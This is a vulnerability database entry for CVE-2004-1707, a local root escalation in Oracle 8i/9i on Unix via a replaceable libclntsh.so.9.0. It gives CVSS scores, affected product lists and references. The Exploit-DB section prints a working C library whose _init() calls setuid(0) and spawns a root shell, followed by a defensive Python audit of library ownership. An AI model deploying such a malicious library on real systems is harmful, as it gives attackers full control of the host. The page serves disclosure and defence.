CVE-2004-1707
CVSS 7.2
Published: 2004-07-30 00:00:00
Last revised: 2016-10-17 22:59:32

[Original] The (1) dbsnmp and (2) nmo programs in Oracle 8i, Oracle 9i, and Oracle IAS 9.0.2.0.1, on Unix systems, use a default path to find and execute library files while operating at raised privileges, which allows certain Oracle user accounts to gain root privileges via a modified libclntsh.so.9.0.


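[CNNVD] Oracle Database Default Library Directory Privilege Escalation Vulnerability (CNNVD-200407-099)

        The (1) dbsnmp and (2) nmo programs in Oracle 8i, Oracle 9i, and Oracle IAS 9.0.2.0.1 on Unix platforms contain a vulnerability. While operating at raised privileges, they use a default path to find and execute library files, which allows certain Oracle user accounts to gain root privileges via a modified libclntsh.so.9.0.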
        

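- CVSS (Base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system shutdown]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (Affected platforms and products)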

cpe:/a:oracle:database_server_lite:5.0.2 Oracle Oracle9i Lite 5.0.2
cpe:/a:oracle:database_server_lite:5.0.1 Oracle Oracle9i Lite 5.0.1
cpe:/a:oracle:database_server_lite:5.0 Oracle Oracle9i Lite 5.0
cpe:/a:oracle:oracle9i:client_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0
cpe:/a:oracle:oracle9i:client_9.2.0.2
cpe:/a:oracle:oracle9i:standard_9.2
cpe:/a:oracle:application_server_portal:3.0.9.8.5 Oracle Oracle9i Application Server Portal 3.0.9.8.5
cpe:/a:oracle:oracle9i:standard_9.2.0.2
cpe:/a:oracle:oracle9i:standard_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.2.0.4
cpe:/a:oracle:oracle9i:standard_9.2.0.3
cpe:/a:oracle:application_server:1.0.2.2.2 Oracle Oracle9i Application Server 1.0.2.2.2
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.0.0
cpe:/a:oracle:oracle8i:standard_8.0.6_.3
cpe:/a:oracle:application_server Oracle Application Server
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.1
cpe:/a:oracle:oracle9i:enterprise_9.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0
cpe:/a:oracle:application_server:9.0.3 Oracle Oracle9i Application Server 9.0.3
cpe:/a:oracle:application_server:9.0.3.1 Oracle Application Server 10g 9.0.3.1
cpe:/a:oracle:application_server_portal:9.0.2.3b Oracle Oracle9i Application Server Portal 9.0.2.3B
cpe:/a:oracle:application_server_portal:9.0.2.3 Oracle Oracle9i Application Server Portal 9.0.2.3
cpe:/a:oracle:oracle8i:standard_8.0.6
cpe:/a:oracle:oracle8i:enterprise_8.0.5_.0.0
cpe:/a:oracle:application_server:9.0.2.0.1 Oracle Oracle9i Application Server 9.0.2.0.1
cpe:/a:oracle:application_server:9.0.2.0.0 Oracle Oracle9i Application Server 9.0.2.0.0
cpe:/a:oracle:application_server_portal:9.0.2.3a Oracle Oracle9i Application Server Portal 9.0.2.3A
cpe:/a:oracle:oracle9i:standard_9.0.1.3
cpe:/a:oracle:oracle9i:standard_9.0.1.2
cpe:/a:oracle:oracle9i:standard_9.0.1.5
cpe:/a:oracle:oracle9i:standard_9.0.1.4
cpe:/a:oracle:oracle9i:personal_9.0.1
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.2
cpe:/a:oracle:oracle8i:standard_8.1.7_.0.0
cpe:/a:oracle:oracle9i:personal_8.1.7
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.1.0
cpe:/a:oracle:oracle9i:personal_9.2.0.4
cpe:/a:oracle:application_server:1.0.2 Oracle Application Server 9i 1.0.2
cpe:/a:oracle:oracle9i:personal_9.2.0.2
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.0
cpe:/a:oracle:oracle9i:personal_9.2.0.3
cpe:/a:oracle:application_server:1.0.2.1s Oracle Application Server 9i 1.0.2.1s
cpe:/a:oracle:oracle9i:enterprise_9.0.1.4
cpe:/a:oracle:oracle9i:enterprise_9.0.1.5
cpe:/a:oracle:application_server:1.0.2.2 Oracle Application Server 9i 1.0.2.2
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.1.0
cpe:/a:oracle:oracle8i:standard_8.1.7_.1
cpe:/a:oracle:oracle8i:standard_8.1.7_.4
cpe:/a:oracle:oracle9i:standard_9.0.2
cpe:/a:oracle:oracle9i:personal_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0.1
cpe:/a:oracle:application_server:9.0.2.1 Oracle Oracle10g Application Server 9.0.2.1
cpe:/a:oracle:application_server:9.0.2.2 Oracle Oracle9i Application Server 9.0.2.2
cpe:/a:oracle:oracle8i:standard_8.1.7
cpe:/a:oracle:application_server:9.0.2.3 Oracle Application Server 10g 9.0.2.3
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.1.0
cpe:/a:oracle:oracle8i:standard_8.1.5
cpe:/a:oracle:oracle9i:enterprise_9.2.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0.2
cpe:/a:oracle:oracle9i:enterprise_9.2.0.3
cpe:/a:oracle:oracle9i:enterprise_9.2.0.4
cpe:/a:oracle:oracle9i:personal_9.2
cpe:/a:oracle:oracle8i:standard_8.1.6
cpe:/a:oracle:oracle9i:standard_9.2.3
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.0
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.0.0
cpe:/a:oracle:oracle9i:personal_9.0.1.5
cpe:/a:oracle:application_server:9.0.2 Oracle Application Server 9i 9.0.2
cpe:/a:oracle:oracle9i:personal_9.0.1.4

- OVAL (Technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1707
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1707
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-099
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109147677214087&w=2
(UNKNOWN)  BUGTRAQ  20040802 OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)
http://www.securityfocus.com/bid/10829
(VENDOR_ADVISORY)  BID  10829
http://xforce.iss.net/xforce/xfdb/16839
(VENDOR_ADVISORY)  XF  oracle-libraries-gain-privileges(16839)

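- Vulnerability information

Oracle Database Default Library Directory Privilege Escalation Vulnerability
High risk  Configuration error
2004-07-30 00:00:00 2006-05-01 00:00:00
Local
        The (1) dbsnmp and (2) nmo programs in Oracle 8i, Oracle 9i, and Oracle IAS 9.0.2.0.1 on Unix platforms contain a vulnerability. While operating at raised privileges, they use a default path to find and execute library files, which allows certain Oracle user accounts to gain root privileges via a modified libclntsh.so.9.0.


- Advisories and patches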

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (24335)

Oracle9i Database Default Library Directory Privilege Escalation Vulnerability (EDBID:24335)
unix local
2004-07-30 Verified
0 Juan Manuel Pascual Escribá
N/A [Download]
source: http://www.securityfocus.com/bid/10829/info

Oracle database implementations are reportedly prone to a default library directory privilege escalation vulnerability. This issue arises due to a default configuration error that will permit the attacker to replace libraries required by setuid root applications with arbitrary code.

This issue would allow an Oracle software owner to execute code as the superuser, taking control of the entire system.

It should be noted that this vulnerability only affects Oracle on UNIX/Linux platforms.

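#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Library initializer: runs as soon as the shared object is loaded,
   with the privileges of the process that loaded it. */
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}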

- Vulnerability information

8286
Oracle Application and Database Server Local Library Privilege Escalation
Local Access Required Misconfiguration
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

Default implementations of Oracle and Oracle Application Server on Linux and Unix based systems contain a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue arises when installed Oracle libraries are owned by Oracle, as is the case on default implementations. A malicious local user with an oracle software account could replace libraries used by setuid root applications with arbitrary code. This would result in the user being able to escalate their privileges or execute code as the superuser. This flaw may lead to a loss of system integrity.
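
The condition described above can be checked on a host with the following audit, an added example that is not part of the original advisory or of any Oracle tooling. It flags libraries needed by a setuid-root binary when the library or any directory above it is not root-owned or is writable by group or others. The install paths and the software-owner uid 500 are constructed placeholders.

```python
import os
import stat
from types import SimpleNamespace

def weaknesses(st):
    """Reasons a path cannot be trusted by a process running as root."""
    found = []
    if st.st_uid != 0:
        found.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        found.append("writable by group or others")
    return found

def chain(path):
    """The file plus every ancestor directory: write access to any of them
    is enough to swap the file that actually gets loaded."""
    path = os.path.abspath(path)
    out = [path]
    while os.path.dirname(path) != path:
        path = os.path.dirname(path)
        out.append(path)
    return out

def audit(binary, libraries, stat_fn=os.stat):
    """Return (library, weak_path, reason) tuples; empty if binary is not setuid root."""
    st = stat_fn(binary)
    if not (st.st_mode & stat.S_ISUID and st.st_uid == 0):
        return []
    return [(lib, p, why) for lib in libraries
            for p in chain(lib) for why in weaknesses(stat_fn(p))]

# Constructed sample: install tree owned by a software-owner account (uid 500).
def entry(uid, mode):
    return SimpleNamespace(st_uid=uid, st_mode=mode)

BINARY = "/opt/oracle-example/bin/dbsnmp"             # placeholder path
LIBRARY = "/opt/oracle-example/lib/libclntsh.so.9.0"  # placeholder path
SAMPLE = {
    "/": entry(0, 0o040755),
    "/opt": entry(0, 0o040755),
    "/opt/oracle-example": entry(500, 0o040755),
    "/opt/oracle-example/lib": entry(500, 0o040755),
    LIBRARY: entry(500, 0o100755),
    BINARY: entry(0, 0o104755),   # regular file, setuid bit set, owner root
}

if __name__ == "__main__":
    for lib, path, why in audit(BINARY, [LIBRARY], SAMPLE.__getitem__):
        print(f"{BINARY} trusts {lib}: {path} is {why}")
```

On a real host, call audit() with the default stat_fn and the library paths the binary actually resolves; an empty result means every file and directory in the load path is root-owned and not writable by group or others.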

- Timeline

2004-07-30 Unknown
2004-07-30 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author
